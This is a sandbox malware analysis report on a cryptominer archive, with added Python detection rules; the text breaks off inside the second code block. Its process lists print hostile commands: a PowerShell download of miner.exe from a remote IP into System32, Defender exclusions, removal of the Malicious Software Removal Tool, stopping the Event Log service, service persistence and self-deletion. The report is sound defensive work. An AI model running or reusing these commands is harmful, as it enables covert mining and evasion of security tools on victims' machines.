Malware Analysis Report

2024-10-16 07:02

Sample ID 240610-by72wsag95
Target Miners.zip
SHA256 5777a295a10efd68effe3367a79f27e47622391cd2c8b66c01eaf8045f1e181c
Tags: themida execution evasion persistence upx trojan
Score: 9/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V15
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral3
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral4
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

Score: 9/10

SHA256: 5777a295a10efd68effe3367a79f27e47622391cd2c8b66c01eaf8045f1e181c

Threat Level: Likely malicious (the verdict for the archive Miners.zip). The static analysis (static1) covers the archive itself; the four executables detonated from it each got their own run: UAC.exe (behavioral1), miner.exe (behavioral2), putty.exe (behavioral3) and update.exe (behavioral4).

Malicious Activity Summary

themida execution evasion persistence upx trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Creates new service(s)

Stops running service(s)

Command and Scripting Interpreter: PowerShell

UPX packed file

Checks BIOS information in registry

Themida packer

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-10 01:39

Signatures

Themida packer

themida
(1 match, no indicator details recorded)

Unsigned PE

(4 matches, no indicator details recorded)

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-10 01:34
Reported: 2024-06-10 01:43
Platform: win10v2004-20240508-en
Max time kernel: 0s
Max time network: 19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UAC.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (2 matches, no further indicator details recorded)

Processes

C:\Users\Admin\AppData\Local\Temp\UAC.exe

"C:\Users\Admin\AppData\Local\Temp\UAC.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://46.102.174.48/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1308,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:8

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'

Network

(Domain "-" means no name was resolved; the connection went straight to the IP.)
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
ZA 46.102.174.48:80 - tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp

Files

memory/2764-0-0x0000000072F4E000-0x0000000072F4F000-memory.dmp

memory/2764-1-0x0000000004EA0000-0x0000000004ED6000-memory.dmp

memory/2764-3-0x0000000072F40000-0x00000000736F0000-memory.dmp

memory/2764-2-0x0000000005550000-0x0000000005B78000-memory.dmp

memory/2764-4-0x0000000072F40000-0x00000000736F0000-memory.dmp

memory/2764-7-0x0000000005E20000-0x0000000005E86000-memory.dmp

memory/2764-17-0x0000000005F90000-0x00000000062E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4lb2uovv.cu1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2764-6-0x0000000005DB0000-0x0000000005E16000-memory.dmp

memory/2764-5-0x00000000054B0000-0x00000000054D2000-memory.dmp

memory/2764-18-0x0000000006460000-0x000000000647E000-memory.dmp

memory/2764-19-0x0000000006510000-0x000000000655C000-memory.dmp

memory/2764-41-0x00000000076F0000-0x0000000007793000-memory.dmp

memory/2764-40-0x0000000006A70000-0x0000000006A8E000-memory.dmp

memory/2764-30-0x000000006F830000-0x000000006F87C000-memory.dmp

memory/2764-43-0x00000000077A0000-0x00000000077BA000-memory.dmp

memory/2764-42-0x0000000007E20000-0x000000000849A000-memory.dmp

memory/2764-44-0x0000000007800000-0x000000000780A000-memory.dmp

memory/2764-29-0x0000000006A30000-0x0000000006A62000-memory.dmp

memory/2764-45-0x0000000007A10000-0x0000000007AA6000-memory.dmp

memory/2764-46-0x0000000007990000-0x00000000079A1000-memory.dmp

memory/2764-47-0x00000000079C0000-0x00000000079CE000-memory.dmp

memory/2764-49-0x0000000007AD0000-0x0000000007AEA000-memory.dmp

memory/2764-50-0x0000000007AB0000-0x0000000007AB8000-memory.dmp

memory/2764-48-0x00000000079D0000-0x00000000079E4000-memory.dmp

memory/2764-53-0x0000000072F40000-0x00000000736F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b6e440957cb681494b7ad917ecd9616e
SHA1 0edb2fbd702f145bce506045a8a95800eb0879f1
SHA256 f4e3c7aa4b570ad8a5d41715de790bb2f84cddc0f84d517aeffafdfce02acfbf
SHA512 d2e5a688a543096662b9759b8f9050909778fbe554ac8e36acc09f2ed7fde9c8f67a23e27c44983a3e75e3dab2fe3cd27da4f55047451571a446a115ea69912c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fbe1aa3f8bdf9d881ee4239f0a312345
SHA1 d349eddcb4d23cf492e2c2deda377fea30f78322
SHA256 7d4348509f354f6485b64c7a8d3b626b30c9e15171e7a07eaa16e5df1c043146
SHA512 91f8ed461381d1c1f9896deddb2b7620d9f19eb4cb296e82f6e845e828132f27d0cac7e05190adc71e68b934f744c0841dd981c2dff27a4bd95429dbe76ee415

Analysis: behavioral2

Detonation Overview

Submitted: 2024-06-10 01:34
Reported: 2024-06-10 01:43
Platform: win10v2004-20240508-en
Max time kernel: 15s
Max time network: 31s

Command Line

"C:\Users\Admin\AppData\Local\Temp\miner.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Process: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe (2 matches, no further indicator details recorded)

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Launches sc.exe

Process: C:\Windows\system32\sc.exe (4 matches, no further indicator details recorded)

Suspicious behavior: EnumeratesProcesses

Process: C:\Users\Admin\AppData\Local\Temp\miner.exe (1 match, no further indicator details recorded)

Processes

C:\Users\Admin\AppData\Local\Temp\miner.exe

"C:\Users\Admin\AppData\Local\Temp\miner.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart
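The two runs above share one playbook. In behavioral1, UAC.exe spawns DllHost with CLSID {3E5FC7F9-9A51-4367-9063-A120244FBEC7}, the CMSTPLUA / ICMLuaUtil COM class that is widely documented as a UAC auto-elevation bypass (consistent with the dropper's name and with the PowerShell that follows writing into System32); it then adds a Defender exclusion for the exe extension and for C:\Windows\System32\, downloads miner.exe from 46.102.174.48 as C:\Windows\System32\msdr.exe, and runs it. In behavioral2, miner.exe adds exclusions for the user profile and ProgramData, uninstalls KB890830 (the Malicious Software Removal Tool), zeroes the standby and hibernate timeouts so the host never sleeps, registers a service called GoogleUpdateTaskMachineQC whose binary lives under C:\ProgramData\Google\Chrome\ rather than under Program Files, stops the Windows Event Log service, and starts the service (the report also records dialer.exe launched several times with no arguments, which the rules below deliberately do not score: a bare system binary is only suspicious in context). The following is an added example, not part of the sandbox report or of the sample: it encodes those command-line patterns as rules and runs them over process-creation events in the shape of Sysmon Event ID 1 or Windows 4688 records. The pid|image|cmdline event lines are constructed from the command lines above; the line format and the PIDs are this example's assumptions.

```python
"""Added example (not from the sandbox report): command-line rules for the
defence-evasion and persistence steps recorded in behavioral1 and
behavioral2, evaluated over process-creation events such as Sysmon Event
ID 1 or Windows Security 4688. The event lines below are constructed from
the command lines in the report; the PIDs are invented for the example."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str       # ATT&CK technique id, used only for triage context
    image: re.Pattern    # matched against the process image path
    cmdline: re.Pattern  # matched against the full command line


RULES = [
    Rule("Defender exclusion added with Add-MpPreference", "T1562.001",
         re.compile(r"\\powershell\.exe$", re.I),
         re.compile(r"\bAdd-MpPreference\b.*-Exclusion(Path|Extension|Process)\b", re.I)),
    Rule("Invoke-WebRequest download written into System32", "T1105",
         re.compile(r"\\powershell\.exe$", re.I),
         re.compile(r"\bInvoke-WebRequest\b.*-OutFile\s+['\"]?C:\\Windows\\System32\\", re.I)),
    Rule("Malicious Software Removal Tool (KB890830) uninstalled", "T1562.001",
         re.compile(r"\\wusa\.exe$", re.I),
         re.compile(r"/uninstall\s+/kb:890830\b", re.I)),
    Rule("Sleep or hibernate timeout set to 0 with powercfg", "T1496",
         re.compile(r"\\powercfg\.exe$", re.I),
         re.compile(r"/x\s+-(standby|hibernate)-timeout-(ac|dc)\s+0\b", re.I)),
    Rule("Service created with binpath under ProgramData", "T1543.003",
         re.compile(r"\\sc\.exe$", re.I),
         re.compile(r"\bcreate\b.*\bbinpath=\s*['\"]?C:\\ProgramData\\", re.I)),
    Rule("Windows Event Log service stopped", "T1562.002",
         re.compile(r"\\sc\.exe$", re.I),
         re.compile(r"\bstop\s+eventlog\b", re.I)),
]

# Constructed from the report's Processes sections: pid|image|command line.
# 2764 and 2184 are the PowerShell PIDs named in the report's memory dumps;
# the other PIDs are invented.
CONSTRUCTED_EVENTS = r"""
2764|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'
2800|C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://46.102.174.48/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'
2184|C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
3001|C:\Windows\system32\wusa.exe|wusa /uninstall /kb:890830 /quiet /norestart
3002|C:\Windows\system32\powercfg.exe|C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
3003|C:\Windows\system32\powercfg.exe|C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
3004|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
3005|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
3006|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe stop eventlog
3007|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
3008|C:\Windows\system32\dialer.exe|C:\Windows\system32\dialer.exe
"""


def load_events(text):
    """Parse the pid|image|cmdline lines into event dicts."""
    events = []
    for line in text.strip().splitlines():
        pid, image, cmdline = line.split("|", 2)
        events.append({"pid": int(pid), "image": image, "cmdline": cmdline})
    return events


def evaluate(events):
    """Return one (technique, rule name, pid) tuple per rule an event matches."""
    hits = []
    for ev in events:
        for rule in RULES:
            if rule.image.search(ev["image"]) and rule.cmdline.search(ev["cmdline"]):
                hits.append((rule.technique, rule.name, ev["pid"]))
    return hits


def techniques_seen(events):
    """Distinct ATT&CK ids hit, which is the shape a triage summary wants."""
    return sorted({technique for technique, _, _ in evaluate(events)})


if __name__ == "__main__":
    for technique, name, pid in evaluate(load_events(CONSTRUCTED_EVENTS)):
        print(f"{technique:10} pid={pid:<5} {name}")
```

The KB890830 rule matches wusa.exe rather than the cmd.exe that launched it, so each removal is counted once; in production, carry the parent image as a field so a hit can be tied back to the dropper. Treat the Add-MpPreference hit as high severity on its own: in behavioral1 it precedes the download, and in behavioral2 it is the first child the miner spawns, so anything Defender might have caught runs after the exclusion is already in place.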

Network

(Domain "-" means no name was resolved; the connection went straight to the IP.)
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 randomxmonero.auto.nicehash.com udp
US 34.149.22.228:443 randomxmonero.auto.nicehash.com tcp
ZA 46.102.174.48:80 - tcp
US 8.8.8.8:53 228.22.149.34.in-addr.arpa udp

Files

memory/2184-0-0x00007FFB42693000-0x00007FFB42695000-memory.dmp

memory/2184-10-0x000002306B8A0000-0x000002306B8C2000-memory.dmp

memory/2184-11-0x00007FFB42690000-0x00007FFB43151000-memory.dmp

memory/2184-12-0x00007FFB42690000-0x00007FFB43151000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqi4cd1s.quy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2184-15-0x00007FFB42690000-0x00007FFB43151000-memory.dmp

memory/1996-26-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1016-41-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

C:\ProgramData\Google\Chrome\updater.exe

MD5 6c8df1dac309514d1cf281d002cba82e
SHA1 6278823628b689b8cd1a63ddb75f596c10ad79cc
SHA256 d570edf6be963fa52770bbf968f0adde34ae5ed01533817d9a28a04e9b469458
SHA512 333145ee62ab3eebdc992d150e8f8b78a7dabcf2c67da8dda22b083826ac55502c32618a6fe08421e0eab274a4660bb8692343a05d2f0c58882631b502f7ae1b

memory/1016-40-0x000002F360AA0000-0x000002F360ACB000-memory.dmp

C:\ProgramData\Google\Chrome\updater.exe

MD5 2a6e21645cd671e4d7d4c68611258396
SHA1 28be0c90f4730d95f314f2d572823ab32d026458
SHA256 7945ece0e2807be03347cf07149ddff5a0f0f8891b8709cf9958072f19001d53
SHA512 606d8f0b4b329586d91d3444f614a1595fa46bda03f232d336dcbe9e7656a473ccafd8ee06564b4aa8e00dba507c9ff7b3fc68b61c443c766d62e5711783095f

memory/612-35-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

memory/612-34-0x0000016316880000-0x00000163168AB000-memory.dmp

memory/664-32-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

memory/612-29-0x00000163167E0000-0x0000016316804000-memory.dmp

memory/4688-320-0x000001A3F2900000-0x000001A3F29B5000-memory.dmp

memory/4688-319-0x000001A3F28E0000-0x000001A3F28FC000-memory.dmp

memory/4688-321-0x000001A3F1C10000-0x000001A3F1C1A000-memory.dmp

memory/4688-322-0x000001A3F2B20000-0x000001A3F2B3C000-memory.dmp

memory/664-31-0x000001E9372F0000-0x000001E93731B000-memory.dmp

memory/4688-323-0x000001A3F2B00000-0x000001A3F2B0A000-memory.dmp

memory/4688-325-0x000001A3F2B10000-0x000001A3F2B18000-memory.dmp

memory/4688-327-0x000001A3F2B50000-0x000001A3F2B5A000-memory.dmp

memory/4688-326-0x000001A3F2B40000-0x000001A3F2B46000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

memory/4688-324-0x000001A3F2B60000-0x000001A3F2B7A000-memory.dmp

memory/1996-23-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

memory/1996-19-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-18-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-17-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-24-0x00007FFB5F820000-0x00007FFB5F8DE000-memory.dmp

memory/1996-22-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-20-0x0000000140000000-0x000000014002B000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted: 2024-06-10 01:34
Reported: 2024-06-10 01:43
Platform: win10v2004-20240426-en
Max time kernel: 5s
Max time network: 20s

Command Line

"C:\Users\Admin\AppData\Local\Temp\putty.exe"

Signatures

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

UPX packed file

upx
(16 matches, no indicator details recorded)

Launches sc.exe

Process: C:\Windows\system32\sc.exe (4 matches, no further indicator details recorded)

Suspicious use of WriteProcessMemory

PID 4536 wrote to memory of 1144 (process: C:\Windows\system32\cmd.exe, target: C:\Windows\system32\choice.exe), 2 matches

Processes

C:\Users\Admin\AppData\Local\Temp\putty.exe

"C:\Users\Admin\AppData\Local\Temp\putty.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "CGMNDIHH"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "CGMNDIHH"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\putty.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 de-zephyr.miningocean.org udp
DE 162.19.241.67:5342 de-zephyr.miningocean.org tcp
US 8.8.8.8:53 67.241.19.162.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp

Files

memory/4692-10-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4464-13-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-18-0x0000000000560000-0x0000000000580000-memory.dmp

memory/4464-22-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-23-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-21-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-19-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-20-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-17-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-15-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-16-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-14-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-11-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-12-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4692-7-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-6-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-5-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-4-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-3-0x0000000140000000-0x000000014000D000-memory.dmp

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

MD5 226477a027b7fc61f6f1bfab1bb469e3
SHA1 fd42239a9149e85e113760b0f9a9a713e08a1522
SHA256 2eb6619c54344cd103c43430f87df4cb00cb3fb7fdc62b55e2a113a4ddec58ef
SHA512 da29f76f783d9064d6dc16d79557dc4f1ec5d286506c961bbd23b37f1dde1df4ec7f8817aa0aeccc3cc3ff7990b167a6577d5c823ae87548d30c5a0ffd36dd13

memory/4464-26-0x00000000005A0000-0x00000000005C0000-memory.dmp

memory/4464-24-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-27-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-29-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-31-0x0000000000FE0000-0x0000000001000000-memory.dmp

memory/4464-32-0x0000000011380000-0x00000000113A0000-memory.dmp

memory/4464-28-0x0000000140000000-0x0000000140848000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted: 2024-06-10 01:34
Reported: 2024-06-10 01:43
Platform: win10v2004-20240508-en
Max time kernel: 5s
Max time network: 32s

Command Line

"C:\Users\Admin\AppData\Local\Temp\update.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (process: C:\Users\Admin\AppData\Local\Temp\update.exe)

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Checks BIOS information in registry

Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (process: C:\Users\Admin\AppData\Local\Temp\update.exe)
Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (process: C:\Users\Admin\AppData\Local\Temp\update.exe)

Themida packer

themida
(12 matches, no indicator details recorded)

UPX packed file

upx
(16 matches, no indicator details recorded)

Checks whether UAC is enabled

evasion trojan
Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (process: C:\Users\Admin\AppData\Local\Temp\update.exe)

Suspicious use of NtSetInformationThreadHideFromDebugger

Process: C:\Users\Admin\AppData\Local\Temp\update.exe (1 match, no further indicator details recorded)

Launches sc.exe

Process: C:\Windows\system32\sc.exe (4 matches, no further indicator details recorded)

Processes

C:\Users\Admin\AppData\Local\Temp\update.exe

"C:\Users\Admin\AppData\Local\Temp\update.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "CGMNDIHH"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "CGMNDIHH"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\update.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe
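behavioral3 and behavioral4 run the same routine with different dropper names: delete and recreate a service named CGMNDIHH whose binary is C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe, stop the Windows Event Log service, start the service, then spawn cmd.exe with `choice /C Y /N /D Y /T 3 & Del "<dropper>"`, where choice is a three-second sleep before the dropper deletes its own file. Two caveats for anyone reading the signature tables: the WriteProcessMemory row in behavioral3 only shows cmd.exe writing into its own child choice.exe, which CreateProcess does for every child and which is not evidence of injection; and the sc.exe rows are matched one command at a time, so the order (create, stop eventlog, start) that makes the chain convincing is lost. The following added example, not part of the sandbox report or of the sample, correlates the chain across a process tree instead: it ties the Del target back to the parent's image path, follows the created service's binpath to the process later started from it, and records whether eventlog was stopped before the service start. The pid|ppid|image|cmdline rows are constructed from the Processes list of behavioral3; every PID other than the 4536 -> 1144 pair named in the WriteProcessMemory signature is invented, as is the services.exe entry that stands in for the Service Control Manager.

```python
"""Added example (not from the sandbox report): correlating the service
persistence and self-deletion chain recorded in behavioral3 and
behavioral4 across the process tree, rather than matching single command
lines. Events are pid|ppid|image|cmdline in creation order, constructed
from the report's Processes sections; every PID except the 4536 -> 1144
pair named in the WriteProcessMemory signature is invented."""
import re

# Constructed from behavioral3 (putty.exe); behavioral4 (update.exe) is the
# same chain apart from the dropper name. services.exe is added as the
# parent the Service Control Manager would give the service binary.
CONSTRUCTED_EVENTS = r"""
700|4|C:\Windows\System32\services.exe|C:\Windows\System32\services.exe
4500|1200|C:\Users\Admin\AppData\Local\Temp\putty.exe|"C:\Users\Admin\AppData\Local\Temp\putty.exe"
4501|4500|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe delete "CGMNDIHH"
4502|4500|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"
4503|4500|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe stop eventlog
4504|4500|C:\Windows\system32\sc.exe|C:\Windows\system32\sc.exe start "CGMNDIHH"
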